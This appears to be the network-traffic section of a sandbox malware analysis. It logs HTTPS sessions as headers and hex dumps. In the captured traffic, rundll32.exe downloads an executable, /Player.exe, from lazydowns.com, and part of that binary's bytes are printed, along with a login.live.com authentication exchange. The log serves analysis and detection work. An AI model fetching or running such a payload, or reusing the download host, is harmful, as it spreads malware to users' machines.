                                                                                                                                                                                    2023-01-05 07:58:27 UTC10545INData Raw: 78 e9 c6 b0 8e be 93 54 a7 0b b0 cf d9 3d b6 a0 10 8f 6c 52 27 c1 fd c7 cf 7b 16 d5 55 69 09 f8 3a 6e 94 ae 31 e6 ed 43 cf f2 78 ce d4 fc 7d 8f c6 15 06 88 0b 7d 44 7d 0d f8 01 6c 1a 09 6c 08 d5 45 0a 35 94 47 09 03 26 bf 51 e0 f9 94 14 23 6d a9 6b e2 55 6c c2 c6 3e 77 2b 6a 45 e1 27 10 a6 43 e1 83 cb c3 7b d7 bc 4f 17 8e 91 d2 6c ed e2 2d 8c 7f 2a 72 0b 30 dd ff 1e 39 6e 66 d9 a2 bb a5 ec 64 f2 aa bf 50 4d c0 c2 b2 e3 ec f5 0f d5 64 61 1c 29 fe af a7 39 cc e3 c1 4f 26 b9 7a 19 f8 b2 92 2c 3e 56 82 e3 84 47 a7 5d 1c b0 af 60 94 d4 6f d6 6d 5b be c0 d4 9f 26 85 de aa 47 ce 29 92 13 8b a7 29 58 d3 61 6e 64 ff c3 8a b2 37 59 9b 88 f8 19 2f 30 55 2b 8e a0 05 81 73 ea a4 b9 21 04 46 7d 41 5d 91 80 33 58 a5 4f b6 d0 02 34 c0 63 23 db 89 4c 35 18 2c 18 2a 95 65
                                                                                                                                                                                    Data Ascii: xT=lR'{Ui:n1Cx}}D}llE5G&Q#mkUl>w+jE'C{Ol-*r09nfdPMda)9O&z,>VG]`om[&G))Xand7Y/0U+s!F}A]3XO4c#L5,*e
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10553INData Raw: 23 f6 d6 7d 7b b4 4f fa 61 e5 be e6 07 27 ec ab c7 44 ae cc f7 ce f1 ac 9a cf 39 22 3d c1 6b f4 08 38 0d 3d 51 1a 4c af 5f b3 b0 49 a2 4d ba 2a 84 5d 91 43 be 11 fd c1 48 1f ac d7 bd 5c ae 38 bc 1b 05 a9 29 65 1d 67 a5 9e 88 34 e8 4e 60 0d f0 dc 37 a3 a6 f4 4f 72 b3 38 fe b4 38 9c 9c 60 1a f6 9e 0d f1 45 24 9e 51 4d 2d 0a 27 ba ba fa 13 e7 23 65 eb 14 ce 94 c5 ca ff 4a 8a b4 82 4e 8c 3c 77 ca b7 a0 59 e1 dd d2 bd 71 58 1c 76 a2 6b dd 3c 34 77 b9 aa f9 57 2b 4b a1 24 89 22 7d 60 70 f5 27 92 82 ec 28 4b a6 db 79 2f 4e 30 ca a1 96 58 18 5a 9c 76 b2 4d 11 41 34 6e 0e 92 52 97 5e 3c ac 11 fe 41 fe cd 36 97 b0 ad 9f 16 c6 eb 40 be 96 6f f4 3c bb 88 9c bb e6 35 30 3d 07 f7 fd f9 85 18 46 96 2b de 29 aa 73 b1 21 b2 de e5 9a 95 50 c8 d9 66 7e 2c 15 28 7e 94 10 43
                                                                                                                                                                                    Data Ascii: #}{Oa'D9"=k8=QL_IM*]CH\8)eg4N`7Or88`E$QM-'#eJN<wYqXvk<4wW+K$"}`p'(Ky/N0XZvMA4nR^<A6@o<50=F+)s!Pf~,(~C
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10561INData Raw: 5c db a0 fb f5 7b 05 e8 cb c1 ce e6 19 78 b8 85 07 16 d4 be f7 f5 34 e6 f5 34 b4 9d 85 95 31 84 26 df 2c 4d 42 25 95 bd e4 fb 12 51 3a a5 9b 01 1e e7 14 d8 21 d6 17 99 33 44 e9 69 1a 25 ee 01 37 40 b4 9c c6 cb 0e 0c 02 c9 43 13 c4 33 98 ac 02 30 e5 a2 08 73 ca 58 35 47 f5 6b f4 ba 68 65 a2 a7 33 ee 86 6c 5d 1d 69 8a 1f 5b f2 d5 43 18 3d fc 55 03 96 53 6a db e7 0a 8d 9c 5b 2b 6a 1d c6 3f 78 fa f6 24 3f 8d 2f 58 b5 2f 92 1c 8c 3a 72 18 2f 6d 3c f7 9a 69 75 9e f7 14 43 19 1e 7f 23 0f 15 a0 fd 94 a8 3d a1 93 98 38 c9 32 01 6a da 00 d1 6e 6b 6d 80 c4 a2 1d da 0e 7f 17 6f d3 ec d4 b4 2e 90 b0 db 8c 8a 53 db 93 84 c5 f3 66 21 dc 3c d0 95 0e 16 b8 14 f0 ca e6 63 04 94 9a 87 2e d6 90 ad 38 df 24 dc f8 89 74 65 fc 4a c0 7e 5f c5 60 23 cb 45 9c ae 6f bc 22 d9 57 3b
                                                                                                                                                                                    Data Ascii: \{x441&,MB%Q:!3Di%7@C30sX5Gkhe3l]i[C=USj[+j?x$?/X/:r/m<iuC#=82jnkmo.Sf!<c.8$teJ~_`#Eo"W;
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10568INData Raw: f7 2b 1f a0 1a 9b 51 c3 8f 82 af a3 2a e7 2f fe 76 28 75 aa 9a fa 4a d7 4e 9d e1 f5 67 ed 81 16 11 ca 52 cd 3a 5f 77 76 4c d8 b3 ec 72 de 8a 06 d2 63 bd 00 0e b8 16 61 ee d6 b0 6f b0 6c 0c e4 cf c0 09 62 84 90 f5 2f 22 fc 93 45 7d 50 33 1f 99 3b 78 5a 23 cb 9d 13 f1 15 aa e1 7f e5 ca bd 26 56 51 3b 07 4f 14 77 dd 6f 8d 37 4a 85 16 35 2d c1 0d 09 6b dc 14 bf 96 6d 64 4c a4 2c aa e2 59 5c 9f 3e d8 4d 92 84 89 0c f6 1a 9c 78 b7 fa e7 52 60 0a 4f 0d e9 ee c1 40 66 e8 69 b5 c7 29 38 52 07 a1 c0 d8 30 66 a5 76 c3 fc 3c 4b cb a2 be fa a2 ed 60 ef ba d7 83 09 d0 a4 e6 ed d0 56 a2 d2 9e 9c c8 af f7 f8 e1 36 a7 a8 0e e8 25 27 0e 52 48 db 54 49 2e 58 f3 3a 07 42 28 47 d1 97 0d 17 dc 46 ff 25 f5 7f b8 c2 8d cd 60 ee d6 a6 dc 36 8a 55 bb 2d b6 61 8f 25 9c 9b 31 3f c6
                                                                                                                                                                                    Data Ascii: +Q*/v(uJNgR:_wvLrcaolb/"E}P3;xZ#&VQ;Owo7J5-kmdL,Y\>MxR`O@fi)8R0fv<K`V6%'RHTI.X:B(GF%`6U-a%1?
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10576INData Raw: 92 26 4d 9c 3d 00 4c 6f 43 bf 36 32 e3 ff 9e 92 b7 ad 9d 96 cb 96 c9 dc 9f 7c b2 25 c4 d9 5b c1 f6 2b ca a7 e1 7f 03 d8 34 45 d8 ba 71 bb 8d 2c 3a b2 ce b1 cb 72 9d b8 7a 3a 4c a0 2b 82 41 06 10 98 0b 44 61 4c d5 51 0d f4 da 39 5d 0c ab 22 bc bb da 44 59 35 0a fb 35 58 ee 2c 46 4f fc 35 78 23 1a 0e 48 ae eb c6 21 1d 77 73 a4 76 26 ea 60 1b c3 7a e0 2e d4 e2 56 a3 7b ed f1 a7 e9 b6 7a d8 b7 a0 ae b6 3f 56 3f b1 e7 6a 0f 5e 3e c8 b6 2b 72 5b 35 30 aa 33 d6 f8 8e 87 b9 88 83 e5 cc 1e 19 fc 88 fd 6b ab 3d 32 0b 88 a2 43 12 3c 39 f3 45 c3 70 0e a0 8b 86 10 65 6b 85 ce 91 3b 7a ec e4 16 93 b5 70 1b df 4b aa 42 08 48 38 a8 06 7d ef 48 b8 6e d5 2b 51 ef f1 c5 6a c3 71 30 17 a0 0e ed dd 6b 46 f6 a2 7d 28 42 76 46 39 ef 89 45 fc 20 16 68 80 9b 2b c7 fc c0 d0 72 f5
                                                                                                                                                                                    Data Ascii: &M=LoC62|%[+4Eq,:rz:L+ADaLQ9]"DY55X,FO5x#H!wsv&`z.V{z?V?j^>+r[503k=2C<9Epek;zpKBH8}Hn+Qjq0kF}(BvF9E h+r
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10584INData Raw: f6 ab b9 3d b4 d0 5d 35 b8 7b f5 4f 56 32 87 da 76 06 da 9d 15 da 84 90 02 d3 8e 6a 0e 86 22 f4 1e e3 9d 0c bc 0e 8c 1e f7 c8 36 1e e8 a3 ec 05 ec ae 88 3a 2b 53 34 2b 70 2e e3 29 a4 fe b4 41 32 cf af 00 47 51 6d 92 1c a7 d7 4f 5b bb a5 c0 25 71 d0 f8 17 2f db cf 45 9e 44 33 71 7a 5b 54 bf 36 14 fe f2 f5 9c 85 ce ec 48 ec d8 f4 38 92 4b e1 fa 1f a0 d8 d4 a7 be c0 5b f2 b0 9f 9d 01 bc 28 d6 d6 13 25 9a 68 00 ad 55 25 88 81 8b 6c 99 50 fd 5e eb 2a 7f 8a 3f d7 7d 7d 83 20 38 df ac 58 a2 9b 10 cb 6a 13 9a 1a a5 4e 69 4d 35 e6 12 0f fb 48 80 22 c7 82 dc a4 63 8c ff c5 15 bb d5 73 0d 5a 5c 42 d9 e6 c2 7a 95 bc bb a8 fe 93 31 b3 75 30 3b 87 83 ed 26 5f 0a 6f bb c3 9b aa 06 97 c5 65 36 ec 80 e7 75 13 89 64 0d f7 7a 2f 85 cb b7 4f 26 92 ce 0f 62 f8 64 a9 31 b3 c7
                                                                                                                                                                                    Data Ascii: =]5{OV2vj"6:+S4+p.)A2GQmO[%q/ED3qz[T6H8K[(%hU%lP^*?}} 8XjNiM5H"csZ\Bz1u0;&_oe6udz/O&bd1
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10592INData Raw: f7 91 5f 51 a2 1e 2f 3f c1 d2 6a 33 37 8f 37 86 5f 55 35 6a 3d 23 08 49 7c 6c 84 d1 ab 24 68 e7 2e 2b 7a 3e 33 ac 49 60 4f ca 2e ff b0 53 5f b0 21 14 b6 1b c0 be 09 d4 42 12 95 d2 13 d7 d6 14 65 85 3c 16 59 2e c5 27 d9 03 07 60 77 1b 0b 8e 08 82 17 c8 91 47 29 e7 42 dd 5a 4f 7f 2a 02 0e 43 01 3c 44 7e c7 14 9a 50 7c 0e 88 28 ed c6 c0 98 87 80 11 2f 73 d8 02 21 1e 4b 0c 36 5a 34 8b 0f eb a5 22 e5 59 74 08 79 47 5c 31 ae 9d cf b9 3e b6 97 6a 13 fa 13 cd 55 0a dc 79 2e 5c 80 52 e9 70 38 42 b9 a0 a4 05 88 d8 ed 52 cd 2d d7 a5 c0 83 f5 9d a7 38 38 b0 5d eb ac 6c d6 59 06 59 27 2a 06 29 8d a2 e3 9b 14 8b 4a 05 4b 2d 21 77 db 93 17 20 6a 4d e6 b4 a8 89 cb 3c 40 8d 5f ef 57 11 c4 8b 86 e1 9d d3 af 09 89 30 0e ee 99 c5 de 26 78 41 69 8f 65 25 34 08 8e d6 60 18 c0
                                                                                                                                                                                    Data Ascii: _Q/?j377_U5j=#I|l$h.+z>3I`O.S_!Be<Y.'`wG)BZO*C<D~P|(/s!K6Z4"YtyG\1>jUy.\Rp8BR-88]lYY'*)JK-!w jM<@_W0&xAie%4`
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10600INData Raw: b3 6c 85 ca dd f1 57 11 06 1c 28 71 35 bb 66 39 be 74 d5 37 6d 08 25 6f 69 c7 85 1e 76 87 27 4b f3 c4 69 d3 11 a7 62 fb 32 4d c9 de e0 f6 64 29 37 96 e6 b7 6f 14 f5 c2 ec d6 fa 53 a9 79 60 4c 82 c4 12 39 cc 9c 34 1f 75 50 15 ca 75 be 18 4e 55 6c 8e 98 15 9e d4 04 5c 35 99 5b ed 92 e7 41 41 ed 47 a9 b7 70 ba 21 b8 44 2d 77 de 11 ab ce e1 cd 78 58 8c 44 d9 a5 e0 84 1b 62 af aa a8 7b b9 31 6f 96 14 e8 c2 ae ad b7 fd 67 2b 21 70 10 56 38 24 95 7f bc 9d fd b2 ca 7d 57 cc ce 3d c4 ba 96 e7 02 6d e3 c7 5f 40 eb 2f ec 57 a7 70 08 d0 1f bb e5 cb ef 1b 3d a5 43 e8 d4 51 ca 10 70 7c c4 c2 f2 01 0b 47 57 3b 0a 5c b5 da 3f 6c 33 20 9f b2 d2 75 9b c9 38 e8 db 7c 57 9f 15 10 c5 c6 b5 8e 5c b3 97 47 0d 19 74 2f a7 8c ce c0 98 97 62 9e eb 2c 44 ea a9 eb ba ce a2 14 b2 fd
                                                                                                                                                                                    Data Ascii: lW(q5f9t7m%oiv'Kib2Md)7oSy`L94uPuNUl\5[AAGp!D-wxXDb{1og+!pV8$}W=m_@/Wp=CQp|GW;\?l3 u8|W\Gt/b,D
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10607INData Raw: 00 00 00 00 00 00 00 08 00 05 00 48 03 00 00 00 00 00 00 00 00 00 00 50 03 05 00 82 06 00 00 00 00 00 00 00 00 00 00 d8 09 05 00 d8 02 00 00 00 00 00 00 00 00 00 00 f0 e1 04 00 14 00 00 00 00 00 00 00 00 00 00 00 a8 fd 04 00 14 00 00 00 00 00 00 00 00 00 00 00 d0 f4 04 00 30 00 00 00 00 00 00 00 00 00 00 00 20 e0 04 00 76 00 00 00 00 00 00 00 00 00 00 00 20 78 04 00 3e 00 00 00 00 00 00 00 00 00 00 00 c0 fd 04 00 54 01 00 00 00 00 00 00 00 00 00 00 11 00 41 00 46 00 58 00 5f 00 44 00 49 00 41 00 4c 00 4f 00 47 00 5f 00 4c 00 41 00 59 00 4f 00 55 00 54 00 00 00 00 00 28 00 00 00 18 00 00 00 30 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 83 5d 00 7f 80 81 00 64 68 61 00 6d 5b 60 00 97 7f a2 00 80 80 5c 00
                                                                                                                                                                                    Data Ascii: HP0 v x>TAFX_DIALOG_LAYOUT(0t]dham[`\
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10615INData Raw: 00 00 00 7f 82 99 7d 80 93 97 6b 75 7f 80 7f 7f 7f 80 8c 7f 80 99 9a 7f 83 97 9d 80 80 9a 8f 80 80 89 8e 7f 7f 94 9f 80 80 8c 99 7f 80 7f 7f 80 80 80 80 80 98 97 7c 7f 9b 9d 68 7f 93 98 58 00 00 00 00 80 81 8f 68 6e 7f 7f 7f 80 7f 81 80 7f 7e 8f 98 80 80 aa 99 7f 80 8c 94 7f 80 a4 8e 80 80 93 9c 80 80 92 8a 80 81 93 8f 80 7f 97 97 73 7f 7f 7f 80 7f 80 80 7f 90 85 59 80 8e a8 63 00 00 00 00 79 7f 80 80 7f 7f 81 8c 7f 80 8e 95 80 7e 8e 96 80 92 92 a2 7f 85 9b 9d 80 85 8d 9a 80 87 8d 91 7f 80 a3 a5 80 80 8c 92 80 81 95 82 7f 7f 90 97 7f 7f 7f 80 80 7f 80 7e 7f 8c 8d 6c 00 00 00 00 7a 7f 80 89 7f 7f 84 8e 80 80 99 94 80 8b 82 93 7f 85 90 96 80 85 94 94 7f 80 99 8d 80 8b 8d 9a 80 87 86 9c 80 7f 9e 8f 80 80 84 93 80 80 89 95 80 7f 88 9e 61 80 7f 7f 00 00 00 00
                                                                                                                                                                                    Data Ascii: }ku|hXhn~sYcy~~lza
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10623INData Raw: 28 28 28 c1 6b de 24 e7 fa eb 28 28 28 28 28 28 c1 33 89 c8 12 60 f2 28 28 28 28 c1 bd b8 01 67 c8 23 b1 28 28 28 28 28 28 b1 f3 86 ba c8 ff 13 56 d0 f2 8a 64 24 01 01 01 10 bd 47 28 28 28 28 28 28 b1 d7 ee 24 de 7b 5b 80 ee af 10 67 01 01 01 01 b8 f5 3d 77 28 28 28 28 28 f2 72 ef fb 83 de 1e 1c ca 67 d4 01 01 01 01 01 fb f5 b1 28 28 28 28 28 28 28 b1 3d 66 ac 6f 80 5b 86 de 67 dc dc 4a 6f db b1 28 28 28 28 28 28 28 28 28 28 87 f2 eb 41 0c c3 89 de 1c 29 ac 09 77 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 84 aa 74 83 5b ff 77 d8 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 c1 aa 03 e5 66 18 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 c1 aa 90 78 eb 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 c1 75 41 b4 28 28 28 28 28 28 28 28
                                                                                                                                                                                    Data Ascii: (((k$((((((3`((((g#((((((Vd$G((((((${[g=w(((((rg(((((((=fo[gJo((((((((((A)w(((((((((((((((t[w((((((((((((((((f((((((((((((((((((x(((((((((((((((((((uA((((((((
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10631INData Raw: 82 80 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 7f 7f 7f 60 7c 7f 8f 7c 81 81 a6 a1 99 9d a5 88 9b 84 a6 81 83 7b 94 80 8b 80 9d 81 90 82 a3 9a 91 9f 98 a9 a0 a5 94 7b 85 83 a1 5b 7e 80 a5 6a 7c 81 7e 70 7b 85 79 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: }``||{{[~j|~p{y
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10639INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 80 84 80 68 7f 85 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 81 7d 82 57 81 7c 7e 66 81 68 73 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: h|j}W|~fhs
                                                                                                                                                                                    2023-01-05 07:58:27 UTC10647INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e6 ff c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    39192.168.2.44974368.65.123.54443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:31 UTC10653OUTGET /Player.exe HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                    Host: lazydowns.com


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    4192.168.2.44969920.190.159.22443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:57:00 UTC97OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/soap+xml
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                    Content-Length: 3592
                                                                                                                                                                                    Host: login.live.com
                                                                                                                                                                                    2023-01-05 07:57:00 UTC98OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                    2023-01-05 07:57:00 UTC101INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                    Expires: Thu, 05 Jan 2023 07:56:00 GMT
                                                                                                                                                                                    P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-ms-route-info: R3_BL2
                                                                                                                                                                                    x-ms-request-id: ce047357-ba4b-49f6-82df-13e199282062
                                                                                                                                                                                    PPServer: PPV: 30 H: BL02PFC3A5D6235 V: 0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:56:59 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 1276
                                                                                                                                                                                    2023-01-05 07:57:00 UTC102INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    4068.65.123.54443192.168.2.449743C:\Windows\explorer.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:58:31 UTC10654INHTTP/1.1 200 OK
                                                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                                                    content-type: application/x-msdownload
                                                                                                                                                                                    last-modified: Tue, 03 Jan 2023 19:54:44 GMT
                                                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                                                    content-length: 250368
                                                                                                                                                                                    date: Thu, 05 Jan 2023 07:56:40 GMT
                                                                                                                                                                                    server: LiteSpeed
                                                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                    connection: close
                                                                                                                                                                                    2023-01-05 07:58:31 UTC10654INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 55 a6 4d a0 11 c7 23 f3 11 c7 23 f3 11 c7 23 f3 4a af 20 f2 1b c7 23 f3 4a af 26 f2 8d c7 23 f3 4a af 27 f2 03 c7 23 f3 c4 aa 27 f2 03 c7 23 f3 c4 aa 20 f2 02 c7 23 f3 c4 aa 26 f2 3a c7 23 f3 4a af 22 f2 1e c7 23 f3 11 c7 22 f3 b2 c7 23 f3 8a a9 2a f2 10 c7 23 f3 8a a9 dc f3 10 c7 23 f3 8a a9 21 f2 10 c7 23 f3 52 69 63 68 11 c7 23 f3 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05
                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$UM###J #J&#J'#'# #&:#J"#"#*##!#Rich#PEL
                                                                                                                                                                                    2023-01-05 07:58:31 UTC10670INData Raw: 72 02 8b 00 50 ff 15 a0 00 43 00 8b 55 e4 83 fa 10 72 2c 8b 4d d0 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 c4 01 00 00 52 51 e8 89 44 01 00 83 c4 08 83 ec 18 89 65 cc 8b f4 83 ec 18 8b cc 68 64 a9 43 00 e8 cb 26 01 00 8d 4d 9c e8 33 e2 ff ff 83 c4 18 50 8d 45 08 c6 45 fc 01 50 83 ec 18 8b cc 68 c4 ac 43 00 e8 a8 26 01 00 8d 4d d0 e8 10 e2 ff ff 83 c4 18 8b d0 c6 45 fc 02 8d 4d b4 e8 9f 2d 01 00 83 c4 04 8b d0 c6 45 fc 03 8b ce e8 8f 2c 01 00 83 ec 14 c6 45 fc 04 89 65 ec 8b f4 83 ec 18 8b cc 68 dc af 43 00 e8 64 26 01 00 8b ce e8 cd e1 ff ff 8b cc c6 45 fc 05 6a 01 68 60 5f 43 00 c7 41 10 00 00 00 00 c7 41 14 0f 00 00 00 c6 01 00 e8 fa 2a 01 00 c6 45 fc 03 e8 b1 f6 ff ff 8b 55 c8 83 c4 48 83 fa 10 72 2c 8b 4d b4 42
                                                                                                                                                                                    Data Ascii: rPCUr,MBrI#+RQDehdC&M3PEEPhC&MEM-E,EehCd&Ejh`_CAA*EUHr,MB
